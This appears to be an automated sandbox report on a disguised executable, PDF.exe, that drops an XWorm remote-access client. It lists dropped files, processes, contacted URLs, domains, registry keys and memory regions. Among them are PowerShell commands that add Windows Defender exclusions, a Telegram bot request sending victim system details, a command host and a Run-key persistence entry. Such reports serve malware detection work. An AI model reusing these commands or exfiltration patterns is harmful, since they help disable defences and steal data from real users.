Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
PDF.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\XClient.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\Log.tmp
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1t4f1zhy.vks.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33nkn4nr.0kb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hnxsbv3.r14.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5c0kazp1.vdg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bicpcwxf.cpa.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cabcqsr0.vel.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gz2nxz4j.lf5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jav55545.y45.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2lmzdkt.kuv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lns0gbfq.r5r.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mj1wj1wl.m0r.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odka4pk1.5jz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkl00lyf.s4r.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_terwkftw.twb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tz1zyb2x.2l2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ueuujobp.jmt.ps1
|
ASCII text, with no line terminators
|
dropped
|
There are 11 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\PDF.exe
|
"C:\Users\user\Desktop\PDF.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PDF.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
|
||
C:\Users\user\AppData\Local\Temp\XClient.exe
|
"C:\Users\user\AppData\Local\Temp\XClient.exe"
|
||
C:\Users\user\AppData\Local\Temp\XClient.exe
|
"C:\Users\user\AppData\Local\Temp\XClient.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 1 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
tr3.localto.net
|
|||
https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB97C9347C020046B4843%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20PYW79587S%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6
|
149.154.167.220
|
||
http://go.microsoft.co
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
http://crl.microso
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 8 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
tr3.localto.net
|
185.141.35.22
|
||
ip-api.com
|
208.95.112.1
|
||
api.telegram.org
|
149.154.167.220
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
208.95.112.1
|
ip-api.com
|
United States
|
||
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
185.141.35.22
|
tr3.localto.net
|
Turkey
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
XClient
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
28D1000
|
trusted library allocation
|
page read and write
|
||
642000
|
unkown
|
page readonly
|
||
128D1000
|
trusted library allocation
|
page read and write
|
||
16700C06000
|
trusted library allocation
|
page read and write
|
||
118082C9000
|
trusted library allocation
|
page read and write
|
||
7FFD9B892000
|
trusted library allocation
|
page read and write
|
||
BBA000
|
heap
|
page read and write
|
||
16773923000
|
heap
|
page read and write
|
||
7FFD9BA48000
|
trusted library allocation
|
page read and write
|
||
268F88A2000
|
heap
|
page read and write
|
||
1270000
|
heap
|
page read and write
|
||
C2DCBBE000
|
stack
|
page read and write
|
||
118090AE000
|
trusted library allocation
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
1180649A000
|
heap
|
page read and write
|
||
167102EB000
|
trusted library allocation
|
page read and write
|
||
11809EC8000
|
trusted library allocation
|
page read and write
|
||
1B29A000
|
stack
|
page read and write
|
||
268F8606000
|
heap
|
page execute and read and write
|
||
D80000
|
trusted library allocation
|
page read and write
|
||
7FFD9B756000
|
trusted library allocation
|
page read and write
|
||
268DFFF0000
|
heap
|
page read and write
|
||
7FFD9B6E3000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
129F8000
|
trusted library allocation
|
page read and write
|
||
118206C7000
|
heap
|
page read and write
|
||
16700FA5000
|
trusted library allocation
|
page read and write
|
||
1182075E000
|
heap
|
page read and write
|
||
2BCA8A05000
|
trusted library allocation
|
page read and write
|
||
268F0031000
|
trusted library allocation
|
page read and write
|
||
29CFCD000
|
stack
|
page read and write
|
||
268E1034000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAEE000
|
trusted library allocation
|
page read and write
|
||
7FFD9B88A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B800000
|
trusted library allocation
|
page execute and read and write
|
||
1182074C000
|
heap
|
page read and write
|
||
2BCA5069000
|
heap
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
C2DC6FE000
|
stack
|
page read and write
|
||
268F02F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
268DFEB0000
|
trusted library allocation
|
page read and write
|
||
2BCBEC0A000
|
heap
|
page read and write
|
||
16701E28000
|
trusted library allocation
|
page read and write
|
||
16700FA3000
|
trusted library allocation
|
page read and write
|
||
1180645C000
|
heap
|
page read and write
|
||
1B7F0000
|
heap
|
page execute and read and write
|
||
16701161000
|
trusted library allocation
|
page read and write
|
||
2BCA4F90000
|
heap
|
page read and write
|
||
2BCBF45F000
|
heap
|
page read and write
|
||
2BCBF050000
|
heap
|
page read and write
|
||
11808CA1000
|
trusted library allocation
|
page read and write
|
||
F6D718C000
|
stack
|
page read and write
|
||
167013C5000
|
trusted library allocation
|
page read and write
|
||
16775BFA000
|
heap
|
page read and write
|
||
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
268F8004000
|
heap
|
page read and write
|
||
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
2BCA5220000
|
trusted library allocation
|
page read and write
|
||
1677392F000
|
heap
|
page read and write
|
||
268E1098000
|
trusted library allocation
|
page read and write
|
||
16775AF0000
|
heap
|
page read and write
|
||
268F84BA000
|
heap
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page execute and read and write
|
||
2BCA5230000
|
heap
|
page readonly
|
||
11806410000
|
heap
|
page read and write
|
||
268E0FA1000
|
trusted library allocation
|
page read and write
|
||
2BCA7E1D000
|
trusted library allocation
|
page read and write
|
||
129F1000
|
trusted library allocation
|
page read and write
|
||
64E000
|
unkown
|
page readonly
|
||
A40000
|
heap
|
page read and write
|
||
11809EA4000
|
trusted library allocation
|
page read and write
|
||
2BCBF3FD000
|
heap
|
page read and write
|
||
1C49E000
|
stack
|
page read and write
|
||
2BCA89E0000
|
trusted library allocation
|
page read and write
|
||
2BCA5270000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6DD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
268F88C3000
|
heap
|
page read and write
|
||
268F8600000
|
heap
|
page execute and read and write
|
||
10DF000
|
heap
|
page read and write
|
||
C2DC979000
|
stack
|
page read and write
|
||
118204E0000
|
heap
|
page execute and read and write
|
||
C2DC67E000
|
stack
|
page read and write
|
||
7FFD9BA1C000
|
trusted library allocation
|
page read and write
|
||
1182077E000
|
heap
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
29FC000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA34000
|
trusted library allocation
|
page read and write
|
||
167739C0000
|
trusted library section
|
page read and write
|
||
118099F2000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6ED000
|
trusted library allocation
|
page execute and read and write
|
||
118080A1000
|
trusted library allocation
|
page read and write
|
||
F6D62B8000
|
stack
|
page read and write
|
||
7FFD9BA39000
|
trusted library allocation
|
page read and write
|
||
2BCA5027000
|
heap
|
page read and write
|
||
1B303000
|
heap
|
page read and write
|
||
11806423000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
1B3BF000
|
stack
|
page read and write
|
||
7FFD9B6C4000
|
trusted library allocation
|
page read and write
|
||
29C37A000
|
stack
|
page read and write
|
||
268DE680000
|
trusted library allocation
|
page read and write
|
||
167739F5000
|
heap
|
page read and write
|
||
7FFD9B7C0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
1B40E000
|
stack
|
page read and write
|
||
F6D5E7D000
|
stack
|
page read and write
|
||
118093B0000
|
trusted library allocation
|
page read and write
|
||
C2DD90D000
|
stack
|
page read and write
|
||
29BEFF000
|
stack
|
page read and write
|
||
7FFD9B6C0000
|
trusted library allocation
|
page read and write
|
||
167012A4000
|
trusted library allocation
|
page read and write
|
||
16700D72000
|
trusted library allocation
|
page read and write
|
||
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
16775BE3000
|
heap
|
page read and write
|
||
268E1892000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
2BCBF0EF000
|
heap
|
page read and write
|
||
268E11DF000
|
trusted library allocation
|
page read and write
|
||
268E1E2A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B89A000
|
trusted library allocation
|
page read and write
|
||
C2DC877000
|
stack
|
page read and write
|
||
167758A0000
|
heap
|
page execute and read and write
|
||
16700DB7000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6ED000
|
trusted library allocation
|
page execute and read and write
|
||
C2DCCBE000
|
stack
|
page read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8B4000
|
trusted library allocation
|
page read and write
|
||
268F02F2000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6C2000
|
trusted library allocation
|
page read and write
|
||
16775C09000
|
heap
|
page read and write
|
||
11806310000
|
heap
|
page read and write
|
||
C2DD70E000
|
stack
|
page read and write
|
||
7FFD9B6E0000
|
trusted library allocation
|
page read and write
|
||
16775B82000
|
heap
|
page read and write
|
||
16775944000
|
heap
|
page read and write
|
||
7FFD9B8B2000
|
trusted library allocation
|
page read and write
|
||
1180642F000
|
heap
|
page read and write
|
||
7DF4859A0000
|
trusted library allocation
|
page execute and read and write
|
||
167751D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B861000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
1AF7D000
|
stack
|
page read and write
|
||
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
268DE690000
|
heap
|
page readonly
|
||
16775AF8000
|
heap
|
page read and write
|
||
7FFD9BA04000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
AB6000
|
heap
|
page read and write
|
||
1BA4E000
|
stack
|
page read and write
|
||
11807EC5000
|
heap
|
page read and write
|
||
F6D623E000
|
stack
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
2BCA7F91000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
11808C99000
|
trusted library allocation
|
page read and write
|
||
268DFFF5000
|
heap
|
page read and write
|
||
118183A9000
|
trusted library allocation
|
page read and write
|
||
141E000
|
stack
|
page read and write
|
||
268DE4A5000
|
heap
|
page read and write
|
||
F6D60F7000
|
stack
|
page read and write
|
||
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
7FFD9B75C000
|
trusted library allocation
|
page execute and read and write
|
||
11808128000
|
trusted library allocation
|
page read and write
|
||
118180A1000
|
trusted library allocation
|
page read and write
|
||
7F0000
|
heap
|
page read and write
|
||
2BCA6C86000
|
trusted library allocation
|
page read and write
|
||
2BCBF2C8000
|
heap
|
page read and write
|
||
16701E03000
|
trusted library allocation
|
page read and write
|
||
D93000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8C8000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8C4000
|
trusted library allocation
|
page read and write
|
||
DB0000
|
heap
|
page execute and read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
2BCBF2CC000
|
heap
|
page read and write
|
||
1CCAE000
|
stack
|
page read and write
|
||
268F8728000
|
heap
|
page read and write
|
||
7FFD9B6F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAEC000
|
trusted library allocation
|
page read and write
|
||
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
2BCA7D2E000
|
trusted library allocation
|
page read and write
|
||
F6D6F8F000
|
stack
|
page read and write
|
||
1B36D000
|
stack
|
page read and write
|
||
C2DCC3F000
|
stack
|
page read and write
|
||
268F8468000
|
heap
|
page read and write
|
||
C2DCAB8000
|
stack
|
page read and write
|
||
1B9AE000
|
stack
|
page read and write
|
||
167758A6000
|
heap
|
page execute and read and write
|
||
1B2D0000
|
heap
|
page read and write
|
||
16775B26000
|
heap
|
page read and write
|
||
16773760000
|
heap
|
page read and write
|
||
D90000
|
trusted library allocation
|
page read and write
|
||
27C0000
|
heap
|
page read and write
|
||
2BCA5240000
|
trusted library allocation
|
page read and write
|
||
C2DCB3B000
|
stack
|
page read and write
|
||
11806550000
|
heap
|
page read and write
|
||
11820717000
|
heap
|
page read and write
|
||
29B9A3000
|
stack
|
page read and write
|
||
38B45FC000
|
stack
|
page read and write
|
||
7FFD9B850000
|
trusted library allocation
|
page execute and read and write
|
||
268E12AE000
|
trusted library allocation
|
page read and write
|
||
1110000
|
heap
|
page read and write
|
||
118091CC000
|
trusted library allocation
|
page read and write
|
||
268DE4E7000
|
heap
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
1050000
|
heap
|
page read and write
|
||
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
C2F000
|
heap
|
page read and write
|
||
1670186A000
|
trusted library allocation
|
page read and write
|
||
C2DC3FE000
|
stack
|
page read and write
|
||
16701952000
|
trusted library allocation
|
page read and write
|
||
2BCA52C0000
|
heap
|
page read and write
|
||
268F84AA000
|
heap
|
page read and write
|
||
2BCA7C30000
|
trusted library allocation
|
page read and write
|
||
2BCB6C31000
|
trusted library allocation
|
page read and write
|
||
268F8895000
|
heap
|
page read and write
|
||
268E186B000
|
trusted library allocation
|
page read and write
|
||
7FFD9B891000
|
trusted library allocation
|
page read and write
|
||
16701211000
|
trusted library allocation
|
page read and write
|
||
2BCBF302000
|
heap
|
page read and write
|
||
7FFD9B766000
|
trusted library allocation
|
page read and write
|
||
7FFD9B73C000
|
trusted library allocation
|
page execute and read and write
|
||
C2DC373000
|
stack
|
page read and write
|
||
118205F4000
|
heap
|
page read and write
|
||
268F8866000
|
heap
|
page read and write
|
||
118180D1000
|
trusted library allocation
|
page read and write
|
||
2BCBF128000
|
heap
|
page read and write
|
||
268DE4A1000
|
heap
|
page read and write
|
||
268DE6D0000
|
heap
|
page read and write
|
||
7FFD9BA24000
|
trusted library allocation
|
page read and write
|
||
167759D0000
|
heap
|
page read and write
|
||
29BC7E000
|
stack
|
page read and write
|
||
268E10C4000
|
trusted library allocation
|
page read and write
|
||
11808AF2000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6BD000
|
trusted library allocation
|
page execute and read and write
|
||
16701E23000
|
trusted library allocation
|
page read and write
|
||
F31000
|
stack
|
page read and write
|
||
7FFD9B7D0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B6B3000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B6B2000
|
trusted library allocation
|
page read and write
|
||
2BCA6BC0000
|
heap
|
page execute and read and write
|
||
2BCBF0B3000
|
heap
|
page read and write
|
||
7FFD9BB26000
|
trusted library allocation
|
page read and write
|
||
268E0DE5000
|
trusted library allocation
|
page read and write
|
||
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6BD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
16775ACA000
|
heap
|
page read and write
|
||
29E0000
|
heap
|
page execute and read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
2BCA7DE4000
|
trusted library allocation
|
page read and write
|
||
16700F9D000
|
trusted library allocation
|
page read and write
|
||
268F8714000
|
heap
|
page read and write
|
||
7FFD9BAD2000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA42000
|
trusted library allocation
|
page read and write
|
||
2BCA6C01000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
268F0072000
|
trusted library allocation
|
page read and write
|
||
C2DD98E000
|
stack
|
page read and write
|
||
29C3FE000
|
stack
|
page read and write
|
||
118065B0000
|
trusted library allocation
|
page read and write
|
||
2BCBF440000
|
heap
|
page read and write
|
||
1BD4D000
|
stack
|
page read and write
|
||
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9AE000
|
trusted library allocation
|
page read and write
|
||
268DE3E0000
|
heap
|
page read and write
|
||
268F854E000
|
heap
|
page read and write
|
||
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
268E13CB000
|
trusted library allocation
|
page read and write
|
||
A90000
|
trusted library allocation
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
38B3F7E000
|
stack
|
page read and write
|
||
2BCBF307000
|
heap
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA39000
|
trusted library allocation
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
38B44FF000
|
stack
|
page read and write
|
||
7FFD9B7D0000
|
trusted library allocation
|
page execute and read and write
|
||
2BCA50A6000
|
heap
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
C2DD78C000
|
stack
|
page read and write
|
||
7FFD9B76C000
|
trusted library allocation
|
page execute and read and write
|
||
2BCA6E28000
|
trusted library allocation
|
page read and write
|
||
2BCA84F5000
|
trusted library allocation
|
page read and write
|
||
1076000
|
heap
|
page read and write
|
||
167739F0000
|
heap
|
page read and write
|
||
268F84F7000
|
heap
|
page read and write
|
||
7FFD9B6B2000
|
trusted library allocation
|
page read and write
|
||
29F1000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
16710031000
|
trusted library allocation
|
page read and write
|
||
268F8752000
|
heap
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
268DE630000
|
heap
|
page read and write
|
||
2BCBF37B000
|
heap
|
page read and write
|
||
7FFD9B6CB000
|
trusted library allocation
|
page read and write
|
||
2BCA6B10000
|
heap
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
F6D5F7F000
|
stack
|
page read and write
|
||
7FFD9B6E4000
|
trusted library allocation
|
page read and write
|
||
1C5A0000
|
heap
|
page read and write
|
||
268F88C0000
|
heap
|
page read and write
|
||
2BCA4F80000
|
heap
|
page read and write
|
||
268F849D000
|
heap
|
page read and write
|
||
16775AE8000
|
heap
|
page read and write
|
||
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
7FFD9B796000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B6B4000
|
trusted library allocation
|
page read and write
|
||
268E0A52000
|
trusted library allocation
|
page read and write
|
||
11807E90000
|
heap
|
page execute and read and write
|
||
167004CD000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
BBD000
|
heap
|
page read and write
|
||
7FFD9B870000
|
trusted library allocation
|
page execute and read and write
|
||
1180645A000
|
heap
|
page read and write
|
||
7FFD9B6B4000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6D3000
|
trusted library allocation
|
page execute and read and write
|
||
29C079000
|
stack
|
page read and write
|
||
2BCA5200000
|
trusted library allocation
|
page read and write
|
||
7FFD9B70C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA42000
|
trusted library allocation
|
page read and write
|
||
268DFFFA000
|
heap
|
page read and write
|
||
2BCBF414000
|
heap
|
page read and write
|
||
268F84B8000
|
heap
|
page read and write
|
||
2BCBF1B0000
|
heap
|
page execute and read and write
|
||
2BCBF454000
|
heap
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA48000
|
trusted library allocation
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6E0000
|
trusted library allocation
|
page read and write
|
||
E55000
|
heap
|
page read and write
|
||
268F8724000
|
heap
|
page read and write
|
||
126F000
|
stack
|
page read and write
|
||
16775AEC000
|
heap
|
page read and write
|
||
38B4079000
|
stack
|
page read and write
|
||
7FFD9B9E3000
|
trusted library allocation
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
1300000
|
trusted library allocation
|
page read and write
|
||
1BB4E000
|
stack
|
page read and write
|
||
118204A9000
|
heap
|
page read and write
|
||
167738D7000
|
heap
|
page read and write
|
||
F6D643E000
|
stack
|
page read and write
|
||
268F8630000
|
heap
|
page read and write
|
||
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6E2000
|
trusted library allocation
|
page read and write
|
||
1180913D000
|
trusted library allocation
|
page read and write
|
||
268F0021000
|
trusted library allocation
|
page read and write
|
||
167738D2000
|
heap
|
page read and write
|
||
2BCBF2DC000
|
heap
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
118065E5000
|
heap
|
page read and write
|
||
167102F9000
|
trusted library allocation
|
page read and write
|
||
7FFD9B86A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6D4000
|
trusted library allocation
|
page read and write
|
||
10DD000
|
heap
|
page read and write
|
||
7FFD9B796000
|
trusted library allocation
|
page execute and read and write
|
||
118090DA000
|
trusted library allocation
|
page read and write
|
||
E00000
|
heap
|
page read and write
|
||
16775C0E000
|
heap
|
page read and write
|
||
1677388B000
|
heap
|
page read and write
|
||
D50000
|
heap
|
page read and write
|
||
167758FC000
|
heap
|
page read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
11820810000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
2BCA4FB0000
|
heap
|
page read and write
|
||
7FFD9B70C000
|
trusted library allocation
|
page execute and read and write
|
||
268F8718000
|
heap
|
page read and write
|
||
BE9000
|
heap
|
page read and write
|
||
A20000
|
heap
|
page read and write
|
||
11820519000
|
heap
|
page read and write
|
||
F6D5EFE000
|
stack
|
page read and write
|
||
29BCFE000
|
stack
|
page read and write
|
||
268DE4A7000
|
heap
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
7FFD9B70C000
|
trusted library allocation
|
page execute and read and write
|
||
7A1000
|
stack
|
page read and write
|
||
1180644D000
|
heap
|
page read and write
|
||
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
11806418000
|
heap
|
